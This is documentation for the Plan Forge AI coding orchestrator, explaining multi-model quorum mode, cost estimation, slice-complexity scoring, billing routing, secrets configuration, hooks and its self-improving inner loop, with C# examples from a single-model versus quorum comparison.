loadEscalationChain() reorders models by success rate × cost efficiency. The best-performing, cheapest model moves to position 1 automatically. No configuration needed, just run plans and the forge learns.
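The escalation walk itself (try model A, then B, then C, emitting slice-escalated at each hand-over) can be sketched as a simple loop. Everything here is hypothetical scaffolding: `runWithEscalation`, the synchronous `attempt(model)` callback that returns true when the slice passes, the `emit` sink, and the event payload fields are assumptions, and the real orchestrator runs workers asynchronously.

```javascript
// Illustrative sketch of walking an escalation chain; not the orchestrator's code.
// attempt(model) -> boolean (hypothetical); emit(eventName, payload) is a hypothetical sink.
function runWithEscalation(chain, attempt, emit = () => {}) {
  for (let i = 0; i < chain.length; i++) {
    if (i > 0) {
      // Announce the hand-over before retrying with the next model.
      emit("slice-escalated", { from: chain[i - 1], to: chain[i] });
    }
    if (attempt(chain[i])) {
      return { passed: true, model: chain[i], attempts: i + 1 };
    }
  }
  return { passed: false, model: null, attempts: chain.length };
}
```

When every model in the chain fails, the result reports `passed: false` so the caller can mark the slice as failed and stop.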
Multi-model consensus for complex slices. Multiple models analyze the same problem independently, then a reviewer synthesizes the best approach.
copilot CLI is logged in, --quorum=power|speed|auto fans out across multiple models without any API keys: each leg is a separate copilot subprocess invoked with a different --model flag. The orchestrator's quorum dispatcher (quorumDispatch) calls spawnWorker once per model inside Promise.all; filterQuorumModels drops any model whose CLI/credentials aren't reachable so the quorum gracefully degrades instead of failing.
XAI_API_KEY (or drop it in .forge/secrets.json) and a Grok leg joins the same parallel fan-out alongside your Copilot-served legs; see the worked example below.
dispatchQuorum, which is HTTP-only and does require per-model API keys. That surface only powers the chat reasoning lane, not run-plan.
# Force quorum on all slices
pforge run-plan docs/plans/Phase-7.md --quorum
# Auto-quorum: only trigger for complex slices (threshold ≥ 6)
pforge run-plan docs/plans/Phase-7.md --quorum=auto
# Custom threshold (1-10, higher = fewer slices use quorum)
pforge run-plan docs/plans/Phase-7.md --quorum=auto --quorum-threshold 8
# Flagship preset (Opus + GPT-5.3-Codex + Grok 4.20, threshold 5)
pforge run-plan docs/plans/Phase-7.md --quorum=power
# Fast preset (Sonnet + GPT-5.4-mini + Grok 4.1 Fast, threshold 7)
pforge run-plan docs/plans/Phase-7.md --quorum=speed
| Setting | Effect | Cost Impact |
|---|---|---|
| --quorum | Every slice gets multi-model consensus | 3× normal cost |
| --quorum=auto | Only slices above complexity threshold | 1.2–1.5× normal cost |
| --quorum=power | Flagship models (Opus + GPT-5.3-Codex + Grok 4.20), threshold 5, 5min timeout | 3× at threshold 5 |
| --quorum=speed | Fast models (Sonnet + GPT-5.4-mini + Grok 4.1 Fast), threshold 7, 2min timeout | 1.5× at threshold 7 |
| No flag | Single model per slice | 1× baseline cost |
The most common production setup: ride your Copilot subscription for the bulk of the quorum, add one direct-API leg (Grok or OpenAI) for diversity. Both kinds of leg run in the same Promise.all, with no special config to "merge" them.
Step 1: declare the model mix in .forge.json:
.forge.json
{
  "quorum": {
    "models": [
      "gpt-5.3-codex",            // → copilot CLI subprocess
      "claude-sonnet-4.6",        // → copilot CLI subprocess
      "grok-4.20-0309-reasoning"  // → direct-API worker (XAI_API_KEY)
    ],
    "reviewerModel": "claude-opus-4.7"  // → copilot CLI subprocess
  }
}
Step 2: provision the Grok key (one of):
# Option A: env var (per-shell)
$env:XAI_API_KEY = "xai-..."
# Option B: project-local secrets file (gitignored)
# .forge/secrets.json
{ "XAI_API_KEY": "xai-..." }
Step 3: run with quorum:
# See the projected cost across all four modes first (always tool-backed)
pforge run-plan --estimate docs/plans/Phase-7.md
# Then run, quorum-eligible slices fan out to all three models in parallel
pforge run-plan docs/plans/Phase-7.md --quorum=auto
What happens at slice dispatch:
1. quorumDispatch sees three models in the config.
2. spawnWorker is called three times concurrently. The first two route to the local copilot CLI (no key needed, rides your Copilot subscription); the third routes to the xAI HTTP worker using XAI_API_KEY.
3. quorumReview synthesises them via the reviewer model into a single enhancedPrompt.
If the Grok key is missing, filterQuorumModels drops Grok from the list at run-plan startup and the quorum proceeds with the two Copilot-served legs: no failure, just a smaller jury.
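The graceful-degradation step can be illustrated with a small filter. This is a hypothetical stand-in, not the orchestrator's filterQuorumModels: it assumes only two rules from this worked example (grok-* models need XAI_API_KEY, everything else rides the logged-in copilot CLI), and the `copilotLoggedIn` flag is an invented input.

```javascript
// Hypothetical sketch of dropping unreachable quorum legs before dispatch.
// Rules assumed from the worked example: grok-* needs XAI_API_KEY,
// all other models are served through the copilot CLI when it is logged in.
function filterReachableModels(models, { env, copilotLoggedIn }) {
  return models.filter((model) =>
    model.startsWith("grok-") ? Boolean(env.XAI_API_KEY) : copilotLoggedIn
  );
}

const configuredModels = ["gpt-5.3-codex", "claude-sonnet-4.6", "grok-4.20-0309-reasoning"];
```

With the key absent the jury shrinks to the two Copilot-served models; with it present all three legs remain.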
Two surfaces use the word "quorum." They're related but operate at different scopes:
| | Quorum Mode (this section) | Quorum Advisory (Forge-Master) |
|---|---|---|
| Where | forge_run_plan / --quorum=… | forge_master_ask / Studio tab |
| Decision unit | Per slice | Per prompt |
| Auto-winner? | Yes, reviewer synthesizes one approach | No, human picks the reply |
| Activation | --quorum=auto/power/speed CLI flag | forgeMaster.quorumAdvisory: "auto" \| "always" in .forge.json |
| Cost preview | forge_estimate_quorum tool | quorum-estimate SSE event before dispatch (cancellable) |
| Best for | High-complexity slice execution that benefits from multi-model consensus | High-stakes judgment calls (architectural choices, trade-offs) where dissent is the signal |
You can use both. Quorum Mode runs slice execution; Quorum Advisory helps you decide what to put in the slice in the first place.
forge_estimate_quorum v2.83+
Call forge_estimate_quorum first. Hand-computed quorum estimates have been observed to overshoot reality by an order of magnitude (Phase-COST-TOKEN-COVERAGE field reports). The agent guidance shipped in .github/copilot-instructions.md requires this for any quorum picker UI.
forge_estimate_quorum projects the cost of a plan under all four quorum modes in one round-trip, so there is no need to run --estimate four separate times. It returns per-mode totals plus a per-slice breakdown showing which slices cleared the threshold.
// Direct MCP call
forge_estimate_quorum({
  planPath: "docs/plans/Phase-7.md",
  resumeFrom: 1   // optional, only estimate slices ≥ N
})
// CLI equivalent (runs all four modes under the hood)
pforge run-plan docs/plans/Phase-7.md --estimate --quorum-compare
{
"false": { "totalCostUSD": 0.28, "baseCostUSD": 0.28, "overheadUSD": 0,
"quorumSliceCount": 0, "totalSliceCount": 7, "confidence": "historical" },
"auto": { "totalCostUSD": 0.42, "baseCostUSD": 0.28, "overheadUSD": 0.14,
"quorumSliceCount": 1, "totalSliceCount": 7, "confidence": "historical" },
"power": { "totalCostUSD": 12.50, "baseCostUSD": 0.42, "overheadUSD": 12.08,
"quorumSliceCount": 3, "totalSliceCount": 7, "confidence": "historical" },
"speed": { "totalCostUSD": 1.20, "baseCostUSD": 0.31, "overheadUSD": 0.89,
"quorumSliceCount": 1, "totalSliceCount": 7, "confidence": "historical" },
"slices": [
{ "sliceNumber": 1, "complexityScore": 3, "projectedCostUSD": 0.04, "quorumEligible": false },
{ "sliceNumber": 2, "complexityScore": 6, "projectedCostUSD": 4.18, "quorumEligible": true },
{ "sliceNumber": 3, "complexityScore": 7, "projectedCostUSD": 4.22, "quorumEligible": true },
...
]
}
| Field | Meaning |
|---|---|
| baseCostUSD | What the plan costs without quorum overhead, single-model run for every slice |
| overheadUSD | Δ added by the extra quorum legs + reviewer synthesis. baseCostUSD + overheadUSD = totalCostUSD. |
| quorumSliceCount | How many slices cleared the mode's threshold and will fan out to multiple models |
| confidence | "historical" when calibrated against ≥ 3 prior runs, "heuristic" for cold-start projects |
| slices[].complexityScore | The 1–10 score from scoreSliceComplexity() |
| slices[].quorumEligible | Whether this slice cleared the threshold for the requested mode |
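A caller can turn the response into a quick comparison by computing each mode's multiplier against the quorum-off total and checking the baseCostUSD + overheadUSD = totalCostUSD identity. The helper below is a sketch: `summarizeModes` is a hypothetical name, it reads only the four mode keys shown in the sample response, and the half-cent tolerance is an arbitrary choice.

```javascript
// Hypothetical helper over the response shape shown above.
function summarizeModes(estimate) {
  const baseline = estimate["false"].totalCostUSD; // quorum-off total
  return ["false", "auto", "power", "speed"].map((mode) => {
    const m = estimate[mode];
    return {
      mode,
      totalCostUSD: m.totalCostUSD,
      // How many times more expensive than running without quorum.
      multiplier: m.totalCostUSD / baseline,
      // Does base + overhead add up to the total (within half a cent)?
      consistent: Math.abs(m.baseCostUSD + m.overheadUSD - m.totalCostUSD) < 0.005,
    };
  });
}

// The per-mode figures from the sample response above.
const sampleEstimate = {
  "false": { totalCostUSD: 0.28, baseCostUSD: 0.28, overheadUSD: 0 },
  "auto": { totalCostUSD: 0.42, baseCostUSD: 0.28, overheadUSD: 0.14 },
  "power": { totalCostUSD: 12.5, baseCostUSD: 0.42, overheadUSD: 12.08 },
  "speed": { totalCostUSD: 1.2, baseCostUSD: 0.31, overheadUSD: 0.89 },
};
```

A zero baseline would make the multiplier meaningless, so real code should guard against that case.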
The numbers above come from the heuristic fixture used in capabilities.mjs; they are illustrative, not measured. For a typical mid-size plan (10–15 slices, 1–3 quorum-eligible), real-world numbers from the Plan Forge dogfood corpus look like:
| Mode | Total cost | Multiplier vs baseline | Slices fanned out | Use when |
|---|---|---|---|---|
| false (off) | ~$0.30 – $2.00 | 1.0× | 0 / 12 | Mechanical work, conversions, doc edits |
| --quorum=auto | ~$0.40 – $3.50 | 1.2 – 1.8× | 1–2 / 12 | Default for normal feature work |
| --quorum=speed | ~$1.00 – $4.00 | 1.5 – 2.5× | 1 / 12 (threshold 7) | Tight budget, want consensus only on the genuinely hard slices |
| --quorum=power | ~$10 – $25 | 10 – 30× | 2–4 / 12 (threshold 5) | Architectural slices, security-critical paths, irreversible migrations |
| --quorum (force-all) | ~$30 – $80 | 30 – 100× | 12 / 12 | Almost never. Use auto + selective --quorum-threshold instead. |
Numbers are order-of-magnitude; actual cost depends on slice scope size, host (subscription-covered vs pay-per-token), and the cost-calibration ratio in .forge/cost-history.json. Always estimate before running.
forge_estimate_slice (companion tool) returns cost for one slice with rationale strings like "threshold 5 met: complexity 6" or "mode false: quorum disabled". Useful when you want to ask “is this specific slice worth quorum?” without re-estimating the whole plan.
What makes a slice "complex enough to need quorum"? The orchestrator's scoreSliceComplexity() function (see orchestrator.mjs) reads seven weighted signals from the parsed slice and produces an integer 1–10. Modes then compare that score against their threshold to decide whether to fan out.
| Signal | Weight | Source | What it captures |
|---|---|---|---|
| Scope breadth | 0.20 | slice.scope[].length / 5 | How many files this slice touches. Wide scope ⇒ more places to make a mistake. |
| Dependencies | 0.20 | slice.depends[].length / 4 | How many earlier slices this one builds on. Deep dependencies ⇒ harder reasoning chain. |
| Security keywords | 0.15 | Hits in title + tasks + gate | Matches against auth, crypto, secret, token, password, jwt, oauth, …. Security mistakes are expensive to roll back. |
| Database keywords | 0.15 | Hits in title + tasks + gate | Matches against migration, schema, sql, index, constraint, foreign key, …. Schema changes are often irreversible. |
| Gate complexity | 0.10 | Non-blank lines in validationGate | A long validation gate is a proxy for "this slice has a lot of correctness conditions to satisfy." |
| Task count | 0.10 | slice.tasks[].length / 10 | Many small tasks ⇒ more chances for a single model to lose track. |
| Historical failure rate | 0.10 | .forge/runs/index.jsonl (last 20) | If past slices with similar title words have failed often, this one gets nudged up. Self-tuning over time. |
The raw weighted sum (0–1) is mapped to the final integer via clamp(1, 10, round(raw × 9) + 1).
| Mode | Threshold | What clears it (typical) |
|---|---|---|
| --quorum=power | 5 | Slices touching 3+ files or with deep deps or mentioning auth/schema |
| --quorum=auto | 6 (CLI default) | The above plus a substantial gate or 6+ tasks |
| --quorum=speed | 7 | Only the genuinely hard slices, wide scope and security/db keywords and failure history |
| Custom | --quorum-threshold N | Override per run; 1 = quorum everything, 10 = quorum almost nothing |
power mode (catches the architectural slices), threshold 6 is conservative for auto (catches roughly 10–25% of slices in a typical phase), and threshold 7 fires on <5% of slices. The Adaptive Quorum Threshold system in .forge/quorum-history.json auto-tunes these from your project's run history.
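The tuning rule stated later in this chapter (raise the threshold when fewer than 20% of quorum slices actually needed it, lower it when more than 60% did) can be sketched as follows. The record shape, the step size of 1, and the clamp to the 1–10 range are assumptions for illustration; the real format of .forge/quorum-history.json is not shown in this manual.

```javascript
// Hypothetical sketch of adaptive threshold tuning.
// Assumed history records: { usedQuorum: boolean, neededQuorum: boolean }.
function tuneThreshold(current, history) {
  const quorumRuns = history.filter((h) => h.usedQuorum);
  if (quorumRuns.length === 0) return current; // nothing to learn from yet

  const neededShare =
    quorumRuns.filter((h) => h.neededQuorum).length / quorumRuns.length;

  if (neededShare < 0.2) return Math.min(10, current + 1); // quorum rarely helped: be stricter
  if (neededShare > 0.6) return Math.max(1, current - 1);  // quorum usually helped: be looser
  return current;
}
```

A higher threshold means fewer slices fan out, so the first branch is the one that lowers cost.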
Consider a slice titled "Add JWT refresh-token rotation with Redis backing" with 4 scope files, depends on slices 2 and 5, 7 tasks, a 12-line validation gate, and 1 prior failure in 8 historical matches:
scope = min(4/5, 1.0) × 0.20 = 0.16
depends = min(2/4, 1.0) × 0.20 = 0.10
security = min(2/3, 1.0) × 0.15 = 0.10 // "jwt", "token"
database = min(0/3, 1.0) × 0.15 = 0.00
gate = min(12/5, 1.0) × 0.10 = 0.10
tasks = min(7/10, 1.0) × 0.10 = 0.07
history = (1/8) × 0.10 = 0.0125
──────
raw = 0.5425
score = clamp(1, 10, round(0.5425 × 9) + 1) = 6
→ clears threshold for: power (≥5), auto (≥6)
→ does NOT clear: speed (≥7)
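The same arithmetic can be reproduced in code. The sketch below follows the rubric table and the worked example; it is not the implementation in orchestrator.mjs. The input field names are hypothetical, and the divisors 3 (keyword hits) and 5 (gate lines) are read off the worked example rather than the table.

```javascript
// Illustrative re-implementation of the scoring rubric; field names are assumptions.
const cap = (x) => Math.min(x, 1);

function scoreSlice(s) {
  const raw =
    cap(s.scopeFiles / 5) * 0.2 +      // scope breadth
    cap(s.dependsCount / 4) * 0.2 +    // dependencies
    cap(s.securityHits / 3) * 0.15 +   // security keywords
    cap(s.databaseHits / 3) * 0.15 +   // database keywords
    cap(s.gateLines / 5) * 0.1 +       // gate complexity
    cap(s.taskCount / 10) * 0.1 +      // task count
    s.historicalFailureRate * 0.1;     // historical failure rate (0..1)
  // Map the 0-1 weighted sum onto the 1-10 integer scale.
  const score = Math.max(1, Math.min(10, Math.round(raw * 9) + 1));
  return { raw, score };
}

// Thresholds from the mode table above.
const MODE_THRESHOLDS = { power: 5, auto: 6, speed: 7 };

function modesCleared(score) {
  return Object.keys(MODE_THRESHOLDS).filter((mode) => score >= MODE_THRESHOLDS[mode]);
}

// The JWT refresh-token slice from the worked example.
const jwtSlice = scoreSlice({
  scopeFiles: 4, dependsCount: 2, securityHits: 2, databaseHits: 0,
  gateLines: 12, taskCount: 7, historicalFailureRate: 1 / 8,
});
```

For the example slice this yields a raw value of about 0.5425 and a score of 6, so `modesCleared(jwtSlice.score)` lists power and auto but not speed.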
PFORGE_QUORUM_TURN v2.78+
When quorum runs in multi-agent mode (Claude → Codex → Cursor handoffs), the orchestrator sets the PFORGE_QUORUM_TURN environment variable for the duration of each quorum-leg invocation. This is a coordination signal, not user-facing config, but it shows up in logs and matters when debugging hook behavior.
| Hook / system | Behavior when PFORGE_QUORUM_TURN is set |
|---|---|
| PreAgentHandoff hook | Skipped. Returns { triggered: false, skippedReason: "PFORGE_QUORUM_TURN active" } and logs [PreAgentHandoff] skipping context injection, PFORGE_QUORUM_TURN active. See orchestrator.mjs ~L7585. |
| OpenClaw snapshot post | Skipped. No drift / MTTR / incident snapshot is sent between quorum legs. |
| Cost telemetry | Per-leg cost is tagged quorumTurn: true in slice-N.json so the Cost Report can roll up the legs into a single quorum line item. |
| Tracing | Each leg gets its own trace span but with a shared quorumGroupId so dashboards can collapse them. |
Quorum exists to get independent analyses from each model. If PreAgentHandoff injected the same drift / MTTR / open-incident context into every leg, the models would converge, defeating the whole point. The reviewer (the synthesizing model) does get the full handoff context when it merges the proposals, because that's where the project-wide state actually matters.
PreAgentHandoff to silently skip, which can mask drift alerts. If you see "PFORGE_QUORUM_TURN active" in logs outside a quorum run, something has leaked the variable; clear it with Remove-Item Env:PFORGE_QUORUM_TURN (PowerShell) or unset PFORGE_QUORUM_TURN (bash).
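The skip behavior amounts to an early return keyed on the environment variable. In the sketch below, the skipped return value is copied from the table above; the function name, the `injectContext` callback, and the `{ triggered: true }` result for the normal path are assumptions.

```javascript
// Hypothetical wrapper showing how a hook can honor PFORGE_QUORUM_TURN.
// `env` is an object such as process.env; `injectContext` is a placeholder callback.
function preAgentHandoff(env, injectContext) {
  if (env.PFORGE_QUORUM_TURN) {
    // Quorum legs must stay independent, so no shared context is injected.
    return { triggered: false, skippedReason: "PFORGE_QUORUM_TURN active" };
  }
  injectContext();
  return { triggered: true };
}
```

This also shows why a leaked variable is harmful: every later handoff takes the early return and the context injection never runs.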
📄 Cross-references: Chapter 13 — Multi-Agent for the handoff model · Chapter 20 — Remote Bridge for the OpenClaw snapshot path · Forge-Master Quorum Advisory for the per-prompt counterpart.
The argument for quorum mode is mostly abstract: "synthesis effect," "independent analyses," "reviewer picks the cleaner approach." A single side-by-side run of the same task makes the argument concrete. The numbers below come from a controlled A/B run on a real C# invoicing slice: same plan, same gates, same acceptance criteria; one execution with the default single-model worker, one with three-model quorum. Both passed all gates and the independent reviewer. The difference is in how they passed.
| Metric | Single (control) | Quorum (3-model) |
|---|---|---|
| Tests written | 15 | 18 (+20%) |
| Helper extraction | Inline code, repeated 3× | Extracted helpers, single source |
| Test dates | Hardcoded literals | Relative offsets |
| .NET pattern | Generic ValidationException | ArgumentException.ThrowIfNullOrWhiteSpace |
| Edge cases | Standard happy path | Voided invoice regen, sequence races |
| Total cost | $0.62 | $0.84 (+35%) |
$0.22 of additional spend, both pass review, and the quorum run is measurably more maintainable. Four named patterns drive the difference.
The single-model run inlined volume-discount math in three call sites with slight variations. The quorum run extracted reusable helpers because the synthesizer saw multiple proposals and picked the one that didn't repeat itself.
The quorum run extracted IsWeekend(), CalculateVolumeDiscount(), and ApplyBankersRounding() as private static helpers, called from each invoicing entry point. The single-model run inlined the equivalent ternary expressions at every call site. Same behavior; different debuggability when the discount tier changes a year from now.
// Single model, inlined at three call sites
var discount = quantity >= 100 ? 0.15m : quantity >= 50 ? 0.10m : quantity >= 10 ? 0.05m : 0m;
// Quorum, extracted helper
private static decimal CalculateVolumeDiscount(int quantity) => quantity switch
{
    >= 100 => 0.15m,
    >= 50 => 0.10m,
    >= 10 => 0.05m,
    _ => 0m,
};
Single-model tests pinned dates to literal calendar days. Those tests will fail when those dates pass and the business logic correctly refuses future invoices. Quorum tests used relative offsets that stay green forever.
The single-model run wrote new DateTime(2026, 3, 15) in test fixtures. The quorum run wrote DateTime.Now.AddDays(-7). Identical intent; only one survives March 16th.
// Single model, breaks on March 16th
var invoice = new Invoice { Date = new DateTime(2026, 3, 15) };
// Quorum, stays green forever
var invoice = new Invoice { Date = DateTime.Now.AddDays(-7) };
Validation guard clauses are a tell. The control run used the generic exception path; the quorum run reached for the modern static-helper API that ships better error messages and is the current recommended pattern.
The single-model run used throw new ValidationException("Customer name is required"). The quorum run used ArgumentException.ThrowIfNullOrWhiteSpace(customerName). The quorum reviewer chose the .NET 8+ helper because one of the three workers proposed it; the synthesizer recognized it as the modern equivalent.
// Single model, generic, manual message
if (string.IsNullOrWhiteSpace(customerName))
    throw new ValidationException("Customer name is required");
// Quorum, modern .NET 8+ helper, auto-generated message including parameter name
ArgumentException.ThrowIfNullOrWhiteSpace(customerName);
The +3 tests in the quorum run weren't padding. They were edge cases the single model never wrote because no one model considered both the happy path and the failure mode at the same time. With three independent analyses, edge cases that one model thinks of get surfaced into the synthesis.
The quorum run added a test for voided-invoice regeneration (VoidedInvoice_Regenerate_AssignsNewSequenceNumber) and a test for "concurrent invoice number assignment under two simultaneous requests" (ConcurrentInvoiceCreation_DoesNotReuseSequenceNumbers). Neither appeared in the control run. Both are exactly the kind of test that catches a production bug six weeks after launch.
The pattern across all four examples is the same: one model proposes one thing, another model proposes a cleaner version, the reviewer picks the cleaner one. Inline code vs extracted helper: extraction wins. Hardcoded date vs relative offset: relative offset wins. Generic exception vs modern helper: modern helper wins. Standard tests vs edge-case tests: edge-case tests win. The quorum doesn't make any individual model smarter; it makes the worst-case output of each model less likely to be what ships.
| Slice type | Quorum worth it? | Why |
|---|---|---|
| Auth / billing / payments | Yes | Edge cases here are production bugs that cost money; +35% cost is cheap insurance |
| Database migrations | Yes | Wrong migration is irreversible; multi-model agreement is a meaningful signal |
| Architectural slices (new layer, new pattern) | Yes | The synthesis effect produces noticeably cleaner abstractions |
| Bug fix with tight reproducer | Maybe | If the fix is one line and the test is obvious, single model is fine |
| CRUD endpoint, well-trodden pattern | Probably not | All three models will produce nearly identical code; +35% cost buys nothing new |
| Pure docs slice | No | Synthesis effect doesn't apply to prose; pick the cheapest model that writes well |
--quorum=auto applies this judgment per slice using the complexity scoring rubric. Manual --quorum=power and --quorum=speed let you force the call when you already know which slices are which. The discovery harness uses single-model dispatch by default because audit findings are mechanical; the auto-smelt loop is the place to catch defects, not the discovery pass.
📄 Source: Quorum Mode — What 3 Models Catch That 1 Doesn't on the Plan Forge blog (the controlled A/B run that produced this comparison).
Plan Forge runs in different IDEs and CLI hosts (VS Code + Copilot, Claude Code, Cursor, Windsurf, Zed, the bare CLI). Each host has its own billing surface. The host-aware routing preference (added v2.82, fixes #104) ensures users on non-Copilot hosts don't silently double-pay against subscriptions they're already paying for.
| Mode | Behavior | When to use |
|---|---|---|
| auto (default) | Claude Code / Cursor / Windsurf / Zed prefer direct API first; VS Code + Copilot / CLI keep gh-copilot first | Recommended. Honors whatever subscription the user is paying for. |
| gh-copilot | Always prefer gh copilot regardless of host | You want all spend to land on your Copilot subscription |
| direct-api | Always prefer direct HTTP APIs regardless of host | You're scripting with explicit per-call cost tracking |
| drop | Refuses gpt-* on non-Copilot hosts unless OPENAI_API_KEY is set. Strongest "honor the vendor" stance. | You want to fail loudly rather than spend silently |
{
  "routing": {
    "hostPreference": "auto"  // "auto" | "gh-copilot" | "direct-api" | "drop"
  }
}
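The four modes in the table can be read as a small decision function. The sketch below is an interpretation, not the shipped router: the host labels other than claude-code, the return values, and the choice to make drop behave like auto when it does not refuse are all assumptions.

```javascript
// Hypothetical host labels treated as Copilot-first in this sketch.
const COPILOT_HOSTS = new Set(["vscode-copilot", "cli"]);

// Returns "gh-copilot", "direct-api", or null when the model is refused.
function resolveRoute(model, host, preference, env) {
  const onCopilotHost = COPILOT_HOSTS.has(host);
  const hostDefault = onCopilotHost ? "gh-copilot" : "direct-api";

  switch (preference) {
    case "gh-copilot":
      return "gh-copilot";
    case "direct-api":
      return "direct-api";
    case "drop":
      // Refuse gpt-* on non-Copilot hosts unless an OpenAI key is present.
      if (model.startsWith("gpt-") && !onCopilotHost && !env.OPENAI_API_KEY) return null;
      return hostDefault; // assumption: otherwise same as auto
    case "auto":
    default:
      return hostDefault;
  }
}
```

Under these assumptions, `resolveRoute("gpt-5.3-codex", "claude-code", "drop", {})` returns `null`, which is the "fail loudly" case the table describes.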
Before any model fires in quorum mode, the orchestrator emits a per-model billing surface table to stdout:
Quorum Pre-Run Summary (host: claude-code, preference: auto)
✓ claude-opus-4.7 → anthropic-direct ($0.0061/req)
✓ gpt-5.3-codex → openai-direct ($0.0048/req)
⚠ grok-4.20 → xai-direct ($0.0033/req) needs XAI_API_KEY
✓ claude-sonnet-4.6 → anthropic-direct ($0.0019/req)
Per-slice telemetry now records host, billingSurface, and billingWarning in slice-N.json so cost aggregation can distinguish subscription-covered vs pay-per-token spend in the Cost Report.
The orchestrator tracks model performance in .forge/model-performance.json, success rate, average cost, and duration per model. It auto-selects the cheapest model with >80% historical pass rate.
--estimate accuracy improves automatically.
.forge/quorum-history.json to learn which slices actually need quorum. If <20% needed it, threshold rises (fewer quorum runs = lower cost). If >60% needed it, threshold drops.
--estimate flags slices with 2+ prior failures or >6 tasks as candidates for splitting. Smaller slices cost less and succeed more often.
pforge run-plan --estimate docs/plans/Phase-7.md
pforge cost or Dashboard Cost tab
--model flag
Context: lists per slice (see Chapter 4)
API keys for external providers (xAI Grok, OpenAI) are resolved in order: environment variable → .forge/secrets.json → null.
For local development, store keys in the gitignored .forge/secrets.json:
{
  "XAI_API_KEY": "xai-...",
  "OPENAI_API_KEY": "sk-..."
}
The .forge/ directory is in .gitignore by default, so secrets are never committed.
Add Plan Forge validation to your GitHub Actions PR workflow:
- uses: srnichols/plan-forge-validate@v1
with:
analyze: true # Run consistency scoring
sweep: true # Check for TODO/FIXME markers
threshold: 60 # Minimum analyze score to pass
PRs that fail the threshold are blocked from merging. The action validates file counts, checks for unresolved placeholders, and runs pforge analyze.
GitHub's Copilot cloud agent works on issues autonomously. Plan Forge integrates via .github/copilot-setup-steps.yml, which provisions the agent with Node.js, guardrails, MCP tools, and smith verification before it starts coding.
The orchestrator builds a DAG from [P] tags and [depends: Slice N] declarations. Independent slices run concurrently when workers are available. Merge checkpoints validate that all parallel branches resolved cleanly.
When parallel slices declare overlapping [scope:] paths, the orchestrator flags the conflict before execution starts.
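To make the DAG idea concrete, the sketch below groups slices into "waves" that could run concurrently once their dependencies have finished. The input shape (`id`, `dependsOn`) is an assumption standing in for parsed [depends: Slice N] declarations; how the orchestrator actually parses tags and schedules workers is not shown here.

```javascript
// Group slices into waves: every slice in a wave has all of its dependencies
// satisfied by earlier waves, so the slices in one wave are independent.
// Assumed input shape: [{ id: 1, dependsOn: [] }, ...].
function planWaves(slices) {
  const done = new Set();
  const remaining = new Map(slices.map((s) => [s.id, s]));
  const waves = [];
  while (remaining.size > 0) {
    const ready = [...remaining.values()].filter((s) =>
      s.dependsOn.every((d) => done.has(d))
    );
    if (ready.length === 0) {
      throw new Error("Dependency cycle or unknown slice in a depends declaration");
    }
    for (const s of ready) {
      remaining.delete(s.id);
      done.add(s.id);
    }
    waves.push(ready.map((s) => s.id));
  }
  return waves;
}

const waves = planWaves([
  { id: 1, dependsOn: [] },
  { id: 2, dependsOn: [1] },
  { id: 3, dependsOn: [1] },
  { id: 4, dependsOn: [2, 3] },
]);
```

Here slices 2 and 3 land in the same wave, and slice 4 acts as the merge checkpoint after both.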
# Resume from slice 3 after fixing a failure
pforge run-plan docs/plans/Phase-7.md --resume-from 3
# Dry run, parse and validate without executing
pforge run-plan docs/plans/Phase-7.md --dry-run
When a gate fails, fix the issue manually, then resume. Completed slices are skipped; only the remaining slices execute.
The OpenBrain integration bridges the 4-session pipeline with long-term, cross-session context. Prior decisions, patterns, and postmortems are automatically searched and injected at the start of each session. After every run, lessons are captured for future phases.
As of v3.6, OpenBrain is the documented L3 memory layer, still optional, but loud and easy to enable. Check status with pforge brain status; see install options with pforge brain hint. Plan Forge works without it; the inner loop (Reflexion, Auto-skills, Federation) only improves over time with it. See Project History → v3.6.
Install via extension: pforge ext add plan-forge-memory
Three hooks fire automatically during agent sessions to enforce operational safety:
| Hook | Trigger | Behavior | Blocking |
|---|---|---|---|
| PreDeploy | Before deploy-related file writes or commands | Runs forge_secret_scan + forge_env_diff, blocks on findings | Yes |
| PostSlice | After every slice commit | Runs forge_drift_report, warns on drift regression | No (advisory) |
| PreAgentHandoff | At session start when resuming work | Injects LiveGuard context into agent prompt | No |
Configure in .forge.json:
{
"hooks": {
"preDeploy": { "blockOnSecrets": true, "warnOnEnvGaps": true, "scanSince": "HEAD~1" },
"postSlice": { "silentDeltaThreshold": 5, "warnDeltaThreshold": 10, "scoreFloor": 70 },
"preAgentHandoff": { "injectContext": true, "cacheMaxAgeMinutes": 30, "minAlertSeverity": "medium" }
}
}
See Chapter 16 — What Is LiveGuard? for the full operational intelligence overview.
📄 Full reference: capabilities, CLI Reference — run-plan
The canonical overview. How Plan Forge's deterministic slice executor, the Phase-25 reflective layer, and the Phase-26 competitive layer compose into a single self-deterministic agent loop.
Plan Forge's slice executor is deterministic: same plan, same config, same model routing, same outcome. On top of that spine, the Phase-25 and Phase-26 subsystems let the loop observe itself and feed what it learns back into the next slice, the next plan, or a sibling project. The execution contract stays deterministic; the loop's context gets progressively better-informed. That combination is what we mean by self-deterministic:
The outer pipeline is the same one Plan Forge has always had. The inner loop adds callback arrows that let later stages feed earlier stages without breaking the forward progression.
Two things to notice. First, every backward arrow from Execute, Sweep, and Review is opt-in or advisory by default, so the forward pipeline stays honest. Second, the arrow from Execute back to Harden crosses a plan boundary: a postmortem written at the end of this run is read by the hardener at the start of the next one.
Zooming into a single slice, here is what happens at the slice boundary and how each Phase-25 and Phase-26 subsystem feeds something downstream: the next slice, the next plan's hardener, or a Dashboard promotion surface.
The Phase-25 subsystems are labeled L1–L8 in the capabilities surface (forge_capabilities → innerLoop); the Phase-26 subsystems (C1 competitive, C2 auto-fix, C3 cost-anomaly) extend the same surface. Every node in the diagram corresponds to one entry in INNER_LOOP_SURFACE.subsystems.
Every subsystem, the stage at which it fires, and where its output shows up. See the companion chapters for mechanics and configuration.
| Subsystem | Fires at | Output lands in | Default posture |
|---|---|---|---|
| Reflexion (L7) | Gate fail → retry | Next attempt's prompt | Always on |
| Trajectory (L8) | Slice pass | .forge/trajectories/ | Always on |
| Auto-skill library (L2) | Slice pass → next slice | .forge/auto-skills/ | Always on |
| Adaptive gate synthesis (L6) | Pre-flight | Stdout + Dashboard promotion surface | Suggest (never mutates plans) |
| Postmortem (L5) | Run end | .forge/plans/<basename>/postmortem-*.json | Always on (retention 10) |
| Federation (L4-lite) | Brain miss → cross-repo read | In-memory recall | Off (opt-in, absolute local paths) |
| Reviewer (L4) | Gate-check | Gate-check response, Dashboard | Off, advisory-only |
| Competitive (C1) | Slice start (marked competitive) | Winner's worktree → tree | Off (opt-in) |
| Auto-fix (C2) | Gate fail + small diff | .forge/proposed-fixes/ | Advisory (never auto-apply) |
